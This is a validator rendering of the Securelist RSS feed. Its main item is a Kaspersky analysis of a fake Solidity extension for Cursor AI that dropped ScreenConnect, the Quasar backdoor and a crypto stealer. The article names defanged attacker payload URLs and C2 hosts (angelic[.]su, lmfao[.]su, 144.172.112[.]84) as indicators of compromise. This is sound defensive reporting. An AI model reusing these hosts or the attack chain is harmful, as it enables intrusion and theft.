Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: https://securelist.com/feed/

  1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
  2. xmlns:content="http://purl.org/rss/1.0/modules/content/"
  3. xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  4. xmlns:dc="http://purl.org/dc/elements/1.1/"
  5. xmlns:atom="http://www.w3.org/2005/Atom"
  6. xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  7. xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
  8. >
  9.  
  10. <channel>
  11. <title>Securelist</title>
  12. <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
  13. <link>https://securelist.com</link>
  14. <description></description>
  15. <lastBuildDate>Thu, 10 Jul 2025 11:04:01 +0000</lastBuildDate>
  16. <language>en-US</language>
  17. <sy:updatePeriod>
  18. hourly </sy:updatePeriod>
  19. <sy:updateFrequency>
  20. 1 </sy:updateFrequency>
  21. <generator>https://wordpress.org/?v=6.8.1</generator>
  22.  
  23. <image>
  24. <url>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png</url>
  25. <title>Securelist</title>
  26. <link>https://securelist.com</link>
  27. <width>32</width>
  28. <height>32</height>
  29. </image>
  30. <item>
  31. <title>Code highlighting with Cursor AI for $500,000</title>
  32. <link>https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/</link>
  33. <comments>https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/#respond</comments>
  35. <dc:creator><![CDATA[Georgy Kucherin]]></dc:creator>
  36. <pubDate>Thu, 10 Jul 2025 11:00:41 +0000</pubDate>
  37. <category><![CDATA[GReAT research]]></category>
  38. <category><![CDATA[Malware Technologies]]></category>
  39. <category><![CDATA[Malware Descriptions]]></category>
  40. <category><![CDATA[Malware]]></category>
  41. <category><![CDATA[Backdoor]]></category>
  42. <category><![CDATA[Cryptocurrencies]]></category>
  43. <category><![CDATA[PowerShell]]></category>
  44. <category><![CDATA[Trojan-stealer]]></category>
  45. <category><![CDATA[Open source]]></category>
  46. <category><![CDATA[Financial threats]]></category>
  47. <category><![CDATA[Windows malware]]></category>
  48. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116908</guid>
  49.  
  50. <description><![CDATA[Kaspersky GReAT experts uncover malicious extensions for Cursor AI that download the Quasar backdoor and a crypto stealer.]]></description>
  51. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Attacks that leverage malicious open-source packages are becoming a major and growing threat. This type of attacks currently seems commonplace, with <a href="https://www.kaspersky.com/blog/supply-chain-attacks-in-2024/52965/" target="_blank" rel="noopener">reports of infected packages</a> in repositories like PyPI or npm appearing almost daily. It would seem that increased scrutiny from researchers on these repositories should have long ago minimized the profits for cybercriminals trying to make a fortune from malicious packages. However, our investigation into a recent cyberincident once again confirmed that open-source packages remain an attractive way for attackers to make easy money.</p>
  52. <h2 id="infected-out-of-nowhere">Infected out of nowhere</h2>
  53. <p>In June 2025, a blockchain developer from Russia reached out to us after falling victim to a cyberattack. He&#8217;d had around $500,000 in crypto assets stolen from him. Surprisingly, the victim&#8217;s operating system had been installed only a few days prior. Nothing but essential and popular apps had been downloaded to the machine. The developer was well aware of the cybersecurity risks associated with crypto transactions, so he was vigilant and carefully reviewed his every step while working online. Additionally, he used free online services for malware detection to protect his system, but no commercial antivirus software.</p>
  54. <p>The circumstances of the infection piqued our interest, and we decided to investigate the origins of the incident. After obtaining a disk image of the infected system, we began our analysis.</p>
  55. <h2 id="syntax-highlighting-with-a-catch">Syntax highlighting with a catch</h2>
  56. <p>As we examined the files on the disk, a file named <code>extension.js</code> caught our attention. We found it at %userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.js. Below is a snippet of its content:</p>
  57. <div id="attachment_116913" style="width: 1752px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-116913" class="size-full wp-image-116913" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1.png" alt="A request sent by the extension to the server" width="1742" height="280" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1.png 1742w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-300x48.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-1024x165.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-768x123.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-1536x247.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-740x119.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-1600x257.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223637/open-source-package1-800x129.png 800w" sizes="(max-width: 1742px) 100vw, 1742px" /></a><p id="caption-attachment-116913" class="wp-caption-text">A request sent by the extension to the server</p></div>
  58. <p>This screenshot clearly shows the code requesting and executing a PowerShell script from the web server <code>angelic[.]su</code>: a sure sign of malware.</p>
  59. <p>It turned out that <code>extension.js</code> was a component of the Solidity Language extension for the Cursor AI IDE, which is based on Visual Studio Code and designed for AI-assisted development. The extension is available in the Open VSX registry, used by Cursor AI, and was published about two months ago. At the time this research, the extension had been downloaded 54,000 times. The figure was likely inflated. According to the description, the extension offers numerous features to optimize work with Solidity smart contract code, specifically syntax highlighting:</p>
  60. <div id="attachment_116914" style="width: 1370px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-116914" class="size-full wp-image-116914" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2.png" alt="The extension's description in the Open VSX registry" width="1360" height="816" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2.png 1360w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-300x180.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-1024x614.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-768x461.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-583x350.png 583w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-740x444.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-467x280.png 467w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223729/open-source-package2-800x480.png 800w" sizes="(max-width: 1360px) 100vw, 1360px" /></a><p id="caption-attachment-116914" class="wp-caption-text">The extension&#8217;s description in the Open VSX registry</p></div>
  61. <p>We analyzed the code of every version of this extension and confirmed that it was a fake: neither syntax highlighting nor any of the other claimed features were implemented in any version. The extension has nothing to do with smart contracts. All it does is download and execute malicious code from the aforementioned web server. Furthermore, we discovered that the description of the malicious plugin was copied by the attackers from the <a href="https://open-vsx.org/extension/juanblanco/solidity" target="_blank" rel="noopener">page of a legitimate extension</a>, which had 61,000 downloads.</p>
  62. <h2 id="how-the-extension-got-on-the-computer">How the extension got on the computer</h2>
  63. <p>So, we found that the malicious extension had 54,000 downloads, while the legitimate one had 61,000. But how did the attackers manage to lull the developer&#8217;s vigilance? Why would he download a malicious extension with fewer downloads than the original?</p>
  64. <p>We found out that while trying to install a Solidity code syntax highlighter, the developer searched the extension registry for <code>solidity</code>. This query returned the following:</p>
  65. <div id="attachment_116915" style="width: 912px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-116915" class="size-full wp-image-116915" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3.png" alt="Search results for &quot;solidity&quot;: the malicious (red) and legitimate (green) extensions" width="902" height="989" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3.png 902w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-274x300.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-768x842.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-319x350.png 319w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-740x811.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-255x280.png 255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09223825/open-source-package3-800x877.png 800w" sizes="(max-width: 902px) 100vw, 902px" /></a><p id="caption-attachment-116915" class="wp-caption-text">Search results for &#8220;solidity&#8221;: the malicious (red) and legitimate (green) extensions</p></div>
  66. <p>In the search results, the malicious extension appeared fourth, while the legitimate one was only in eighth place. Thus, while reviewing the search results, the developer clicked the first extension in the list with a significant number of downloads – which unfortunately proved to be the malicious one.</p>
  67. <h2 id="the-ranking-algorithm-trap">The ranking algorithm trap</h2>
  68. <p>How did the malicious extension appear higher in search results than the legitimate one, especially considering it had fewer downloads? It turns out the Open VSX registry ranks search results by relevance, which <a href="https://github.com/eclipse/openvsx/blob/master/server/src/main/java/org/eclipse/openvsx/search/RelevanceService.java" target="_blank" rel="noopener">considers multiple factors</a>, such as the extension rating, how recently it was published or updated, the total number of downloads, and whether the extension is verified. Consequently, the ranking is determined by a combination of factors: for example, an extension with a low number of downloads can still appear near the top of search results if that metric is offset by its recency. This is exactly what happened with the malicious plugin: the fake extension&#8217;s last update date was June 15, 2025, while the legitimate one was last updated on May 30, 2025. Thus, due to the overall mix of factors, the malicious extension&#8217;s relevance surpassed that of the original, which allowed the attackers to promote the fake extension in the search results.</p>
  69. <p>The developer, who fell into the ranking algorithm trap, didn&#8217;t get the functionality he wanted: the extension didn&#8217;t do any syntax highlighting in Solidity. The victim mistook this for a bug, which he decided to investigate later, and continued his work. Meanwhile, the extension quietly installed malware on his computer.</p>
  70. <h2 id="from-powershell-scripts-to-remote-control">From PowerShell scripts to remote control</h2>
  71. <p>As mentioned above, when the malicious plugin was activated, it downloaded a PowerShell script from <code>https://angelic[.]su/files/1.txt</code>.</p>
  72. <div id="attachment_116917" style="width: 1748px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116917" class="size-full wp-image-116917" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1.png" alt="The PowerShell script contents" width="1738" height="462" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1.png 1738w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-300x80.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1024x272.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-768x204.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1536x408.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1317x350.png 1317w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-740x197.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-1053x280.png 1053w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224142/open-source-package4-1-800x213.png 800w" sizes="auto, (max-width: 1738px) 100vw, 1738px" /></a><p id="caption-attachment-116917" class="wp-caption-text">The PowerShell script contents</p></div>
  73. <p>The script checks if the ScreenConnect remote management software is installed on the computer. If not, it downloads a second malicious PowerShell script from: <code>https://angelic[.]su/files/2.txt</code>. This new script then downloads the ScreenConnect installer to the infected computer from <code>https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest</code> and runs it. From that point on, the attackers can control the infected computer via the newly installed software, which is configured to communicate with the C2 server <code>relay.lmfao[.]su</code>.</p>
  74. <h2 id="data-theft">Data theft</h2>
  75. <p>Further analysis revealed that the attackers used ScreenConnect to upload three VBScripts to the compromised machine:</p>
  76. <ul>
  77. <li><code>a.vbs</code></li>
  78. <li><code>b.vbs</code></li>
  79. <li><code>m.vbs</code></li>
  80. </ul>
  81. <p>Each of these downloaded a PowerShell script from the text-sharing service <code>paste.ee</code>. The download URL was obfuscated, as shown in the image below:</p>
  82. <div id="attachment_116918" style="width: 880px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116918" class="size-full wp-image-116918" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5.png" alt="The obfuscated URL for downloading the PowerShell script" width="870" height="189" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5.png 870w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-300x65.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-768x167.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-740x161.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09224354/open-source-package5-800x174.png 800w" sizes="auto, (max-width: 870px) 100vw, 870px" /></a><p id="caption-attachment-116918" class="wp-caption-text">The obfuscated URL for downloading the PowerShell script</p></div>
  83. <p>The downloaded PowerShell script then retrieved an image from <code>archive[.]org</code>. A loader known as <a href="https://www.sonicwall.com/blog/vmdetector-based-loader-abuses-steganography-to-deliver-infostealers" target="_blank" rel="noopener">VMDetector</a> was then extracted from this image. VMDetector attacks <a href="https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america" target="_blank" rel="noopener">were previously observed</a> in phishing campaigns that targeted entities in Latin America. The loader downloaded and ran the final payload from paste.ee.</p>
  84. <p>Our analysis of the VBScripts determined that the following payloads were downloaded to the infected computer:</p>
  85. <ul>
  86. <li>Quasar open-source backdoor (via <code>a.vbs</code> and <code>b.vbs</code>),</li>
  87. <li>Stealer that collected data from browsers, email clients, and crypto wallets (via <code>m.vbs</code>). Kaspersky products detect this malware as <code>HEUR:Trojan-PSW.MSIL.PureLogs.gen</code>.</li>
  88. </ul>
  89. <p>Both implants communicated with the C2 server <code>144.172.112[.]84</code>, which resolved to <code>relay.lmfao[.]su</code> at the time of our analysis. With these tools, the attackers successfully obtained passphrases for the developer&#8217;s wallets and then syphoned off cryptocurrency.</p>
  90. <h2 id="new-malicious-package">New malicious package</h2>
  91. <p>The malicious plugin didn&#8217;t last long in the extension store and was taken down on July 2, 2025. By that time, it had already been detected not only by us as we investigated the incident but also by <a href="https://secureannex.com/blog/these-vibes-are-off/" target="_blank" rel="noopener">other researchers</a>. However, the attackers continued their campaign: just one day after the removal, they published another malicious package named &#8220;solidity&#8221;, this time exactly replicating the name of the original legitimate extension. The functionality of the fake remained unchanged: the plugin downloaded a malicious PowerShell script onto the victim&#8217;s device. However, the attackers sought to inflate the number of downloads dramatically. The new extension was supposedly downloaded around two million times. The following results appeared up until recently when users searched for <code>solidity</code> within the Cursor AI development environment (the plugin is currently removed thanks to our efforts).</p>
  92. <div id="attachment_116919" style="width: 902px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116919" class="size-full wp-image-116919" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6.png" alt="Updated search results for &quot;solidity&quot;" width="892" height="881" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6.png 892w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-300x296.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-768x759.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-354x350.png 354w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-740x731.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-283x280.png 283w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-800x790.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225435/open-source-package6-50x50.png 50w" sizes="auto, (max-width: 892px) 100vw, 892px" /></a><p id="caption-attachment-116919" class="wp-caption-text">Updated search results for &#8220;solidity&#8221;</p></div>
  93. <p>The updated search results showed the legitimate and malicious extensions appearing side-by-side in the search rankings, occupying the seventh and eighth positions respectively. The developer names look identical at first glance, but the legitimate package was uploaded by <code>juanblanco</code>, while the malicious one was uploaded by <code>juanbIanco</code>. The font used by Cursor AI makes the lowercase letter <code>l</code> and uppercase <code>I</code> appear identical.</p>
  94. <p>Therefore, the search results displayed two seemingly identical extensions: the legitimate one with 61,000 downloads and the malicious one with two million downloads. Which one would the user choose to install? Making the right choice becomes a real challenge.</p>
  95. <h2 id="similar-cyberattacks">Similar cyberattacks</h2>
  96. <p>It&#8217;s worth noting that the Solidity extensions we uncovered are not the only malicious packages published by the attackers behind this operation. We used our <a href="https://www.kaspersky.com/open-source-feed?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______da69c993382d038a" target="_blank" rel="noopener">open-source package monitoring tool</a> to find a malicious npm package called &#8220;solsafe&#8221;. It uses the URL <code>https://staketree[.]net/1.txt</code> to download ScreenConnect. In this campaign, it&#8217;s also configured to use <code>relay.lmfao[.]su</code> for communication with the attackers.</p>
  97. <p>We also discovered that April and May 2025 saw three malicious Visual Studio Code extensions <a href="https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/" target="_blank" rel="noopener">published</a>: solaibot, among-eth, and blankebesxstnion. The infection method used in these threats is strikingly similar to the one we described above. In fact, we found almost identical functionality in their malicious scripts.</p>
  98. <div id="attachment_116920" style="width: 2058px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116920" class="size-full wp-image-116920" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7.png" alt="Scripts downloaded by the VS Code extension (left) vs. Solidity Language (right)" width="2048" height="673" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-300x99.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-1024x337.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-768x252.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-1536x505.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-1065x350.png 1065w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-740x243.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-852x280.png 852w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/09225529/open-source-package7-800x263.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a><p id="caption-attachment-116920" class="wp-caption-text">Scripts downloaded by the VS Code extension (left) vs. Solidity Language (right)</p></div>
  99. <p>In addition, all of the listed extensions perform the same malicious actions during execution, namely:</p>
  100. <ul>
  101. <li>Download PowerShell scripts named <code>1.txt</code> and <code>2.txt</code>.</li>
  102. <li>Use a VBScript with an obfuscated URL to download a payload from <code>paste.ee</code>.</li>
  103. <li>Download an image with a payload from <code>archive.org</code>.</li>
  104. </ul>
  105. <p>This leads us to conclude that these infection schemes are currently being widely used to attack blockchain developers. We believe the attackers won&#8217;t stop with the Solidity extensions or the solsafe package that we found.</p>
  106. <h2 id="takeaways">Takeaways</h2>
  107. <p>Malicious packages continue to pose a significant threat to the crypto industry. Many projects today rely on open-source tools downloaded from package repositories. Unfortunately, packages from these repositories are often a source of malware infections. Therefore, we recommend extreme caution when downloading any tools. Always verify that the package you&#8217;re downloading isn&#8217;t a fake. If a package doesn&#8217;t work as advertised after you install it, be suspicious and check the downloaded source code.</p>
  108. <p>In many cases, malware installed via fake open-source packages is well-known, and <a href="https://www.kaspersky.com/premium?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team___kprem____3b7590825188da5e" target="_blank" rel="noopener">modern cybersecurity solutions</a> can effectively block it. Even experienced developers must not neglect security solutions, as these can help prevent an attack in case a malicious package is installed.</p>
  109. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  110. <p><em>Hashes of malicious JS files</em><br />
  111. <a href="https://opentip.kaspersky.com/2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______15e454c813399698&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb</a><br />
  112. <a href="https://opentip.kaspersky.com/404dd413f10ccfeea23bfb00b0e403532fa8651bfb456d84b6a16953355a800a/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a444b95d7774347e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">404dd413f10ccfeea23bfb00b0e403532fa8651bfb456d84b6a16953355a800a</a><br />
  113. <a href="https://opentip.kaspersky.com/70309bf3d2aed946bba51fc3eedb2daa3e8044b60151f0b5c1550831fbc6df17/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a3a9d7e904e1afbc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">70309bf3d2aed946bba51fc3eedb2daa3e8044b60151f0b5c1550831fbc6df17</a><br />
  114. <a href="https://opentip.kaspersky.com/84d4a4c6d7e55e201b20327ca2068992180d9ec08a6827faa4ff3534b96c3d6f/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______25d59420923fce49&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">84d4a4c6d7e55e201b20327ca2068992180d9ec08a6827faa4ff3534b96c3d6f</a><br />
  115. <a href="https://opentip.kaspersky.com/eb5b35057dedb235940b2c41da9e3ae0553969f1c89a16e3f66ba6f6005c6fa8/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a74f12d1df1716d6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">eb5b35057dedb235940b2c41da9e3ae0553969f1c89a16e3f66ba6f6005c6fa8</a><br />
  116. <a href="https://opentip.kaspersky.com/f4721f32b8d6eb856364327c21ea3c703f1787cfb4c043f87435a8876d903b2c/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______e4cb94c2d8cae386&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f4721f32b8d6eb856364327c21ea3c703f1787cfb4c043f87435a8876d903b2c</a></p>
  117. <p><em>Network indicators</em><br />
  118. <a href="https://opentip.kaspersky.com/https%3a%2f%2fangelic.su%2ffiles%2f1.txt/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______b7b775297c8232d8&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https://angelic[.]su/files/1.txt</a><br />
  119. <a href="https://opentip.kaspersky.com/https%3a%2f%2fangelic.su%2ffiles%2f2.txt/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a615208f7bd479c2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https://angelic[.]su/files/2.txt</a><br />
  120. <a href="https://opentip.kaspersky.com/https%3a%2f%2fstaketree.net%2f1.txt/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a2d811f1afd06829&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https://staketree[.]net/1.txt</a><br />
  121. <a href="https://opentip.kaspersky.com/https%3a%2f%2fstaketree.net%2f2.txt/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______60d15c7f54ab30d2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https://staketree[.]net/2.txt</a><br />
  122. <a href="https://opentip.kaspersky.com/https%3a%2f%2frelay.lmfao.su/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______84fee5d079d4f042&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https://relay.lmfao[.]su</a><br />
  123. <a href="https://opentip.kaspersky.com/https%3a%2f%2flmfao.su%2fbin%2fscreenconnect.clientsetup.msi%3fe%3daccess%26y%3dguest/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______c77ed022878cd83c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest</a><br />
  124. <a href="https://opentip.kaspersky.com/144.172.112.84/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______14a8d925177cd204&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">144.172.112[.]84</a></p>
  125. ]]></content:encoded>
  127. <wfw:commentRss>https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/feed/</wfw:commentRss>
  128. <slash:comments>0</slash:comments>
  131. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  132. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  133. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  134. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/10083020/solidity-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  135. </item>
  136. <item>
  137. <title>Approach to mainframe penetration testing on z/OS. Deep dive into RACF</title>
  138. <link>https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/</link>
  139. <comments>https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/#respond</comments>
  141. <dc:creator><![CDATA[Denis Stepanov, Alexander Korotin]]></dc:creator>
  142. <pubDate>Tue, 08 Jul 2025 10:00:16 +0000</pubDate>
  143. <category><![CDATA[Research]]></category>
  144. <category><![CDATA[Pentest]]></category>
  145. <category><![CDATA[Security assessment]]></category>
  146. <category><![CDATA[Offensive cybersecurity]]></category>
  147. <category><![CDATA[Mainframes]]></category>
  148. <category><![CDATA[z/OS]]></category>
  149. <category><![CDATA[SQLite]]></category>
  150. <category><![CDATA[Cybersecurity]]></category>
  151. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116873</guid>
  152.  
  153. <description><![CDATA[We have explored the RACF security package in z/OS and developed a utility to interact with its database. Now, we are assessing RACF configuration security for penetration testing.]]></description>
